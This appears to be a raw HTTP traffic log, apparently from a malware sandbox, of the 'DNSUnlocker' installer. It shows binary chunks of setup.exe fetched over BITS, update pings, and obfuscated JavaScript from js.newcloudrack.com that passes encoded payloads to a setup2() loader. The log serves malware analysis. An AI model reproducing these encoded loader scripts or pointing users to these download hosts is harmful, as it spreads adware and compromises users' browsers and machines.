    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:40 GMT
    Via: 1.1 varnish
    Age: 1608
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 990
    X-Timer: S1456422160.842481,VS0,VE0
    Content-Range: bytes 13792-25330/1153385
    Content-Length: 11539
    ....u......V.u..u......^]...U....H...B.SV.E..p<[email protected]..}.....W
    .E......u.VS.}...V.4....}.....ur.}.SW..,[email protected]...
    [email protected].'....u..T...j..........n...j
    ..u....}.............E.;.u..M....f......A....E.....=..........j.3.Y.}.
    .u....E....B.h..B..E..}[email protected]@...tVP..xr@.
    V......p.B.........t(...DC.u [email protected].
    u..#......E......}.....t..}.......u....e...e..VS.....V.$.....u..E.....
    ...B.VW.9...3.S.S...;..E.t53.;.t-.E.P.E.P.E.PW.U...ul..t.f!.W.=.....K;
    .f..\.u.3.VW.....W.o...;.t.. [email protected]:.E........E.V
    [email protected]...... .}..E.........E.....3....}......j......9].t.;.s..
    E.......<.B.9Y.t Pj.h.........9].t.Wj.V.......h..B.V.u.......E.;...
    .B.u.j..#....E..E..p.t..].3.9]....P.....9].u.9...B.u..{.......B..u..u.
    .u......_^[....U...}[email protected]....}..u-.u..u
    [email protected][email protected].^][email protected]......._j.
    [s.j._j.[......s.j.3.[[email protected].=...P..
    %[email protected]@....V.u.
    .58.B..f..._^[........B.....B.3...t.V.A..t..t$..........Ju.^...U....8V
    [email protected].}.j.j.h....W...}..t<[email protected]@..E.Pj.h
    ....W...E.fu.......E..E..E.Pj.h....W.E........E._^....U....PSV.5,[email protected]
    [email protected]..}......]..E..."....E
    .j....B....B.[.}....Pj@.][email protected]`[email protected]@.j..E..u
    [email protected][email protected]..([email protected]
    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    

    Accept: */*
    Accept-Encoding: identity
    Range: bytes=25331-36869
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:42 GMT
    Via: 1.1 varnish
    Age: 1610
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 996
    X-Timer: S1456422162.138030,VS0,VE0
    Content-Range: bytes 25331-36869/1153385
    Content-Length: 11539
    .Zy..>y..0y.."y...y...x...x...x...x...x...x..|x..`x..Tx..Hx...w..6x
    ..*x...x...x...w...z...................................}...}...}...~..
    .~..,~..<~..N~..^~..l~..~~...~...~...~...~...~...~...~...~.......}.
    .4...F...T...f...z.......................R}..<}..0}...}...}...|...|
    ...|...|...}...}...}..~}..r}..$...b}...|...|...|..||..t|..d|..R|..B|..
    0|.."|...|...|...{...{...|......v...`...N.......4...$...............Ri
    chEdit....RichEdit20A.RichEd32....RichEd20.....DEFAULT\Control Panel\I
    nternational....Control Panel\Desktop\ResourceLocale....[Rename]....%d
    ..Software\Microsoft\Windows\CurrentVersion...\Microsoft\Internet Expl
    orer\Quick Launch.....................................................
    ..#. .3.;.C.S.c.s.....................................................
    ......................p.p.......................!.1.A.a...............
    ........... .0.@.`....................................................
    .......................F...............F...............F.u...........{
    ..`p...v..............lq...u..........v...<p...v..............Pq..d
    u...............p...u..............(p...w..........D...xr...w.........
    .....hr......................,[email protected]........
    ...................h...X...H...2........................y...y...y...y.
    ..y...y...y...z.. z..4z..Jz..Rz..bz..pz...z...z...z...z...y...z...z...
    z...{...{...{..>{..L{..\{..n{...{...{...{...{...{...{..ry..fy..Zy..
    >y..0y.."y...y...x...x...x...x...x...x..|x..`x..Tx..Hx...w..6x..*x.
    ..x...x...w...z...................................}...}...}...~...
    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    

    Accept: */*
    Accept-Encoding: identity
    Range: bytes=36870-60156
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:43 GMT
    Via: 1.1 varnish
    Age: 1611
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 999
    X-Timer: S1456422163.281776,VS0,VE0
    Content-Range: bytes 36870-60156/1153385
    Content-Length: 23287
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    .............................................._.......................
    ......................V.............................................QS
    `.............%..............................RST..........S;..........
    ....S.................QOTh.........P;??..............U...............Q
    OK`.........P;?@@?..............S..............#J^`........P;?@@@@?...
    ...........U............"IK`h........DdEBA@@@@=............SU.........
    .$.JLh........cgg..jEA>..<...........SO...........HK^h..........
    .....eE...............OU........%.FJ^h................j...............
    SI..........FJ]b................e...............SOU......%..'M]b......
    ..........e..............._OI......$.(*MXob...........................
    ....VP ........(3W\a..........hpppiffT..............VPIU......)25[n...
    ..............................ZPI ......07km..........................
    ........ZPI ......678...................................ZP......./6~..
    ................................aZXJ........6~8.......................
    ....a.ZaZaZXKJ........679m.............................Z_ZT_PI....
    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    

    Accept: */*
    Accept-Encoding: identity
    Range: bytes=60157-106798
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:44 GMT
    Via: 1.1 varnish
    Age: 1612
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 1000
    X-Timer: S1456422164.355846,VS0,VE0
    Content-Range: bytes 60157-106798/1153385
    Content-Length: 46642
    .A/...\..Ys..kH]...?]v..R.r..7.....kS..nH......*R...E...<81M.c.m...
    uC....y............~...........{..u...~.o..=...{.E........vj.[.w.u?..&
    lt;....n2...L..y.JO;h...dN2....L...|k0ZN<4......).d....)....\l..<
    ;..y._....x.,....7m.......~..1.4i....='.b..p.Y..?.{.J/~.~.'...*.yRM...
    .-..{..t.5.......&..../..6.....M...R..;_..e..~Bcl.}.14.....e...92z.)..
    ..~... 0....?...|..U.7..|.[..TY6\..f.........I...O}...j.b...?u.{Ak.yJ.
    .w...)oJk.eJ..7..*.u..[..X..c....5..m5.T...j..t.(.f.....VYM....Q.E1=.|
    W.>F.S..{jJ.s..y.-..K..CN.So..V.....Y..B.:..u;.mx..G.)....E/.......
    .....Z.....-.Y.(.....5.......,K.....?.s.....uP.....$;._!...YM.*.{.....
    ......E..........J....g...m.A....}.,...jq.L...i29E&/..Sd.K&.....l.....
    v..5..'....k.vxi....C...7c...c.L..0O......{c..&,tS...36..>.........
    g.oN>I.E.X.S.5...U.a....Tg.Y...fd.T.........w.s*0.....j..h..:..(J.i
    ...W.o..{..In....=)..FY......45N1.....C.........6......1....Y&.jr>M
    ....a...b..;.M...g.p..........o.1.w'....N...1P.TK\.]J...Y".(.U$...[...
    .N.W..9..1.N.x.... >.n..G.\.9]L...{E.....~. j.h.$......juu...7.....
    .. .'.s47...>Y<....F.Xc..i>....F.T[.._....2...d..5..BK&M..&..
    *qz.6GVcg...b.d7XM_8...;^)..!......m.>....z8....NT.~yj7...3...v....
    x...G.j...E.V...oN.1.....6.....q.2...#.....<..-6....}.}..=@}[email protected]
    i4E.....1m.qe..[....l..d~........N..'j.S.is....r...M..xS.=.kd../w.s..#
    ....kY...F.w...._t.4..&[..(%@U...-.J.l..a....j.......&...Mf.D.ib...=_.
    >w...........y.....bEm...A9..l...'.a4..[.S...1}o..I.{X.....n.q&.bG.
    ......M.b.S..."....^..`;!.].z.=f.y.#b..{....h[<5.....0P9R....?m
    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    

    Accept: */*
    Accept-Encoding: identity
    Range: bytes=106799-199361
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:45 GMT
    Via: 1.1 varnish
    Age: 1613
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 1004
    X-Timer: S1456422165.419858,VS0,VE0
    Content-Range: bytes 106799-199361/1153385
    Content-Length: 92563
    P...2....h..`Juy......Z.z...\o...t.G.W.........S.9..{..oH3.E........~.
    [q..b...3(..^PteU.....`d....8.......>.W..._.;..|. &R..!..3.....x.\.
    ^h.%...........(.w....z......du-)...$=9f..Av!...T...P.\2Yl..Ez u..A..f
    ..N......oxq,A.b0*...M..#.......n_>..F..t..8..l........:J.r...=U2XH
    7.B.ns..[[email protected]..?....Yi.Ux.3
    ...J.@ .. ._%'.V...t..7.".e.]9.J....%h.8.gJ\[email protected]........
    ..R.w._...._..._B.X....<........[..A..-.%.....l..bv.....k......x..!
    ...w.....W&m.....G|"3....[.~7...e.-.b<...Ao.mS..p..6.dQ).....o...}i
    .t\.U...(..}.........x.jv9.8.c8.O?!Y]N.c.......aZ..... .....0..Lb:k.x.
    .v}<.~.z.d.......H...C.yU9..S............y....=.....U.*.....i.....i
    &..S...{..s...j..Q..!.....@.,)...P.@ ....%_.k....&{..d.W....d..&i.7...
    ...}.k...2........^.]..{.,O.sN.#D......=...T.)......'...$..o.%W..Zr...
    kQ......G.L...o:0 ......?..M.h.c=......h...7?`|..F...7.............{u/
    z.gYI.z.sy6..b......*.$..Mr8.CO>.'K..H.d.D.\.TR.u"=....'Aq.A.8.5...
    ...G@q|.][email protected]..,.@...)......S-.......T...g3.n....w
    *.`.V..<N.7kO_.)...N.L...)l1..neAU...s .w....$Z.=.m_....../..).&...
    ..9>....p.l.Cn....d:.7.."..A.s..$.. ..p..^...s.A..._1..../..k.~.U..
    tT.y`Ev5E./.V..>[email protected]..[..&....}..IO..~_O....a.
    ..../....(.0....PX.A.x..{.<..h.......a......=S..Bbv.<..L.%-Kn.XL
    .2.7.K.?...<[email protected]"[email protected].`E:..".HP..I..a.*VTZo.
    z.-m..EL.$......X..1X......[k.s..%(.........\.Y{....{.u.Nt...........0
    }...\]1.....c...xf.....l..i...B.- .....Y....C...h.R..z..&..l.u..{.
    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    

    Accept: */*
    Accept-Encoding: identity
    Range: bytes=199362-382774
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:46 GMT
    Via: 1.1 varnish
    Age: 1614
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 1007
    X-Timer: S1456422166.481635,VS0,VE0
    Content-Range: bytes 199362-382774/1153385
    Content-Length: 183413
    =.k-..X..m.e....q...<.n.. ..'g%0.O.........."....G....E..]Cf!.2Z.q.
    ......=0.....D......).i..4-...@. ..;.....kw{.......&.Z.].O6......O...G
    Yf.$.i.<u.....3!.z5.I......K.,............K..*.nH...$..eV...(z...n.
    \3V.~.V./.(.......9.D..h...h.N.EI...pW......6..~V|`nL.,.....!-....Y.1.
    V...j......K.....D......8@.@v.#.......$..(..W.pb..T.7..C.4.........f..
    ..Z.~G.m`.8J...j.-;....;....S..{....wY..S.l8'...6p..d.m.....,[email protected].
    ..).y.#...s..,R...,H...O.H.,.K....)~C..<2..#,'.....B#..!B..."..D..g
    .Z.......V..5. z..q...Y.....-=.....SdXP.....E.f,u.\Ql.2....r.(2}.yI...
    .t...p......fHQ.......d.....{.2m1.......o;Y.g.hC......G%.........Z...m
    ..6.....l...8.7Pr[.g.a.>.9..=...>r...\FS.t...m.Jz}....\y...V^ra3
    .......}.......x.a...(Z.r.C..pE'..i...9..Nu1.bK.G...-.U.irpz.!2.(_E..&
    lt;. ..D`Q.VL....R.i.-Lp9H.s...N...sY.{$4.Z*U....P.D./G`.H.KF...;.....
    e..!.Z..........nO.b.u..66x G.Q.w.J.c,..l......p?..5.3..X.....uF.H..yh
    ...........x.x14...p...W9...P.O.T.@s..%..ko...k.{s .(P..%..X..I.Q..F.E
    .'&]..k........2"c.....9..J.f..&.5..:D..g.j...uD\..5. .M...f3^.p.>A
    ..C^Q.._A....A.A.g.......!..i&..<q....n.C.4..*zj......NM.8l..8<R
    .....Wc..0..O..S\.....|a....X.#.....S....D#..z....%..x.....#..Z.3..~D.
    ..lJ.......~".C..8....!I.I..1.&.?...63X.6.!.n..GH.|.b.q."p..v.....Tj..
    [email protected].#...5.f.........f4..{V..GaF.%({o.C`..f,...8T.....:.B8.
    ..x.....].........{....`...'..4:.f:6-.V.T[...h..r.SJ8......f.,....o...
    ..3..r.S....`..N.3.'(.D...q.;..j.Z.{2...X..A..._...%..m.r...L#X)...l..
    B'....@......{../..0h...N.0.1(.!.IA2.g$.#.S*.&'w...c..X\.a=.m...."
    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    

    Accept: */*
    Accept-Encoding: identity
    Range: bytes=382775-754213
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:47 GMT
    Via: 1.1 varnish
    Age: 1615
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 1011
    X-Timer: S1456422167.543334,VS0,VE0
    Content-Range: bytes 382775-754213/1153385
    Content-Length: 371439
    zg.#...d.!.i...E..oKM.iN.H|.....(rA...AX'z. .>.b.7.G..j...~X..9/iX.
    ..u...f.8........Lu....5...'\....-...............7..h...QV..F~....K.xS
    .bc. 5.\...V..Otg.&.z.mI.*....im.&w....... ..4FH;.0.]..4.M.....*.J,J..
    .VJ.x.......]..^...E...fJ8N.k .#x4..}...._..aT.4.Z*..cf=.p.E.(.......R
    \..L.....!trA.......xQ].xB......S.O;1..-#....y?O.rrW|dR....] ..|.:.rE.
    ..D./.....R1.H.&..[#-...Q..............V...h.V..`..T....z g.!"...$.o,.
    ..H*.&..S.W..j....3.......];V5.-3.LV .Dm!...e..|.m..5.R...wm...a...).D
    [email protected].$.}...A.BAt...=.AL..4......0..g6...k.F'.../...)M.o.'D{C..&g
    t;E..#E.D.N.H`[email protected].%.......h.....x?B...i..@\..0_.
    ^...7z.{GS..I....%K.b.B....y#.|.....k...=..Dp_r....2u...l..9vStQ9.i.H.
    ~n_O....{..e.=.W....CB....ck:...........D2.f.....d......v..w..v.K.4w..
    .6.W.(..R\..}-...e..B..i.W.....x....e..;Z..`.......M..[9.g".......~...
    C.h..>....q#......fn.....3lz...2Z.2.&....... ..;....n..0.'W....T..0
    t.k.c......{..v.f....0.2...`.......&.; ....7......V`.9..t`.>j......
    ..T.D.....d..3....&..3.N.r.k....v=F(............w.!..4..q....n_)s.....
    b..9.....3.T.tc......[[email protected]..._Q../a......y..Ze8.b.
    =.........A:.......w.^...A..........'J..q.6.p.A.\.`*q<)..d...v..;J.
    ..jJ../6..s.....e.=Bh.&.......86..&....'.Xk....w..>2..7...R-RB..2..
    r.m... .ELF.c....%c.....Vs.r.wt .r.=S......d.....J.........k$...u..M..
    Ln......I.r...... s....x.L(..'.....c..Y2...W.K.u..B&yB,...-..1.......b
    .(uz........./tt...?......'..wx.\; ...H......&.!.f.:.._N...hN.p...0 ..
    U.W.}...#..y..a~..F.....o.....`..G.PP1.8.hz..3...q..2..~.......D).
    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    

    Accept: */*
    Accept-Encoding: identity
    Range: bytes=754214-1153384
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:48 GMT
    Via: 1.1 varnish
    Age: 1616
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 1015
    X-Timer: S1456422168.607492,VS0,VE0
    Content-Range: bytes 754214-1153384/1153385
    Content-Length: 399171
    )....Xk.~......:.........,.s.b...`...1d...3.v'xI.w...`..........h.G...
    .....:...ET.|..SY..0...qcFOS....6.b..yV/_[.".i7..K[..........j..z..G..
    3................Qa..r._.Oc.R..*~.R.....Q....(.G..2.........l..T..0.k.
    w..U..BQ..v^.{?B..&..t.%M.<H*..F...c..[c.7..C.R.Q..e..x._.3....t...
    E.{...H.....7........Y6.r."9G.V........^9.?...s.(...;!..,q..J..6...v..
    ! ...y.3s#[email protected][email protected]..?($h..-....k....t(Zl...
    ..X....</u...=`........<:[email protected].*W.Z4.g.....
    .7.p..9...~..A...=..l...f....a...mg.'.#...4Yu.xA.y|...K~<F.G]....x.
    ....q5.^.k.X.../.g.......KJK...)..5..g..;.yD.6^k....k.....|8.h.*.8...r
    .XB.9...f..l..x&9...z..L.,.7n...^....0....*...k.L2.......8.]-...w.....
    ....C...V7#a..9S.c\47,w.v.]Egq"......#{.I.C..l.m.....sE..qF....2..).m}
    ,......9.j...A..m.....s./i..C..H...p.H..Fm.....U../D3...8.T........'..
    ...J.l.O..U..$r...|......[..?.Zl#..O(G..>..z...X.rZj!..vN.W......1.
    f.$=..Q.^..9...jcl....[*}..[....M....B...`...x<..p..#..#..N.,'.....
    ..0~.|.n.<Ri.>}9..m..m....&..n.4L....."...../.e....4[d.G$....g..
    .K.!.i..x...f...jS..o..a...z..[..J5..k.....H..U .d.E..A.L.Q'C..Z/....w
    .f..M...B..<8.~Qp.9l..}9.().(4=.~.%.3v>g,BS'.........oEO.^...8C.
    AH^.&...?..x...?#!...s....R..M.u.W...J.....RlL.h.1.V.z....J*c....n2...
    HT>n....$..^...V....]...]..R.'..}.d?.Y..V....DXrl....*.4.i.. ~...Jl
    ..o.....\.N...[...*..CSr...k..;....r.B.iT.!*Jd......8..YBGx.....;.._Aw
    b!W...b{$...`..u.Z...../...}...V.e...)0.R...C.).......`..[........vb.~
    O.(3...3..N=.....0..2^.Z[!...^...|.".... ...a6g.6.z..AWy.>r/.V.
    <<< skipped >>>
    

    GET /installer_updates/002201/update.json HTTP/1.1
    User-Agent: NSIS_Inetc (Mozilla)
    Host: update.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:14 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1410796465"
    Last-Modified: Mon, 15 Sep 2014 15:54:25 GMT
    Cache-Control: max-age=21600
    Content-Length: 39
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1456422134.dop005.fr7.t,1456422134.cds020.fr7.s,1456422134.dop003.se1.r,1456422134.cds013.se1.p,1456422134.cds020.fr7.p
    {"update_from_version":"NA","url":"NA"}..

    

    GET /omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: update.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:22 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1454602831"
    Last-Modified: Thu, 04 Feb 2016 16:20:31 GMT
    Cache-Control: max-age=12635
    Content-Length: 229
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1456422142.dop010.fr7.t,1456422142.cds047.fr7.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">.  <daystart elapsed_seconds="56754"/>.  <
    ;app appid="{430fd4d0-b729-4f61-aa34-91526481799d}" status="ok">.  
    .<event status="ok"/>.  </app>.</response>...

    

    GET /plugins/mins/424.js?ver=3&rnd=41 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1435500466"
    Last-Modified: Sun, 28 Jun 2015 14:07:46 GMT
    Cache-Control: max-age=900
    Content-Length: 1855
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop006.fr7.t,1456422148.cds005.fr7.c
    if (typeof setup2 === 'function') { setup2('MTY1MzBiMWUwMjFiMjUxMTFhNG
    M1NzUzMGIxZTAyMWI0YTRjNTkxZDVlNWYwMjA3MTcxMTFmMGQxNzE5MWU1ZjAwMDUxYjQ0
    MTUxYjAyNWY0MzA2MDYwODA1MDQxYzBlMTkwMDQzMTIwYzA3NTkxYzAzM2MxOTBjMGIyZT
    BiMDcyOTE4MDMwMTI5NDAwNzAyNWMwOTE3MDYwMDAyMWYwOTAzMzgwNzU3MjkzNDMzMzEz
    OTNkM2UyMzJhMmUzMzM5MmYyMDM3MjMzZDJlMmEyZTI5MzQ1NjAwMTkxYjAzMDUxMTEzMz
    UwNDE0MDY0YjMxMzIzMjMxMjUyNTM4MjIyYTMyMmIzZjJlMjAyNTIzMjUyNDMxMmYzMTJl
    M2UyNzJmMjkzNDU2MGExODFkMTkxMDBmMDYxNzFmMTkwYzE4M2EwNDFjMDY1NzI5MzQzMz
    MxMzkzZDNlMjMyYTJlMzMzOTJmMmEzODNkMzkzMDJmMjYyOTNmMzkyZTMzMzEzMjU3MDIx
    YTA2MjIzNDVlMjkzMTJlMjMyYzM5MjUzOTM5MjczMzNjMzIzMDMzM2EyOTIyMzQzYzI5ND
    gyNDMzMmEyOTRiMzQyZjIwMjQyMTNlMjIzMTIzMzIyZTIyM2MzZjIwM2UyNTIyMjYzYTJl
    MjIzYzIzM2QyODIzM2MyMzMyMzQyZjQ1MTcxZTFkM2YwMjA3MTM1NjJmM2MzNTNjMjIyMj
    MwMzgzZjJmMzUzMTI5MmYzZDIxM2MyNDM3MjYzNTNjMjk0ODFlMDQwMTIzMzI1NjJmM2Mz
    NTNjMjIyMjMwMzgzZjJmMzUzMTI5MmIzNTI1MjYyNDMyMmUzNDNjMjUzYjJmMmUyYTJlMj
    kzNDUyNGY1NDA2MTkwNTEzMTkyMzE5MWM0MTRjNGMwNTA1MTcxYTA1NTE1ZjRjMDU1ZDQz
    MTAwZTBiMGMwNDFlMDIwMTFkNDMxMjBjMDc1OTBlMDgxNzQ3NDAxYTE0MDExOTE5MDcxZD
    BjMTg0MDBlMWUwZTQ1MDExODJmMGMxNDA4MzIxOTBlMzUwNTE4MTIzYzU4MDQxZTRlMDAw
    YjFiMWIxMTBhMTEwMDI0MTU1ZTM1MjkyODIyMmMyNTNkM2YzODI3MmYyNDM0MzMyMjNiM2
    UzMjM4MjczNTI5NGQxMzBjMDMwMDE5MDMxYTI5MTkwZjE1NWUyOTMxMmUyMzJjMzkyNTM5
    MzkyNzMzM2MzMjMyMmMzZjM4M2YyMjNhMjkyZDIyMzUyNjM1Mjk0ZDE5MGQwNTFhMGMxZD
    BmMGIwMjAyMWYwZDIyMDcwMDE0NWUzNTI5MjgyMjJjMjUzZDNmMzgyNzJmMjQzNDM5MmQy
    NTNhMmMzZDJmMzUyMjIyM2QyNjI5MzE0YjEwMTMxYTNmMmY0ZDNjMjkyZDNmM2UzMDM5Mj
    QyMjM0MjYyNDMxMmMyMTMzMzUzZjJmMmYzYzUwMjcyZjM4MjA1NzI5MzQzMzMxMzkz
    <<< skipped >>>

    GET /plugins/mins/223.js?ver=9&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1418314404"
    Last-Modified: Thu, 11 Dec 2014 16:13:24 GMT
    Cache-Control: max-age=900
    Content-Length: 823
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop006.fr7.t,1456422148.cds007.fr7.c
    if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MD
    gxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFj
    NTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNj
    E0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQy
    NTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0Mj
    gzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJj
    MDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYT
    AzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMx
    ODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2
    YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIy
    MmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMD
    E5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }    ....


    GET /plugins/mins/273.js?ver=6&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newcloudrack.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:28 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1418314330"
    Last-Modified: Thu, 11 Dec 2014 16:12:10 GMT
    Cache-Control: max-age=900
    Content-Length: 903
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1456422148.dop006.fr7.t,1456422148.cds007.fr7.c
    if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMD
    AxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3
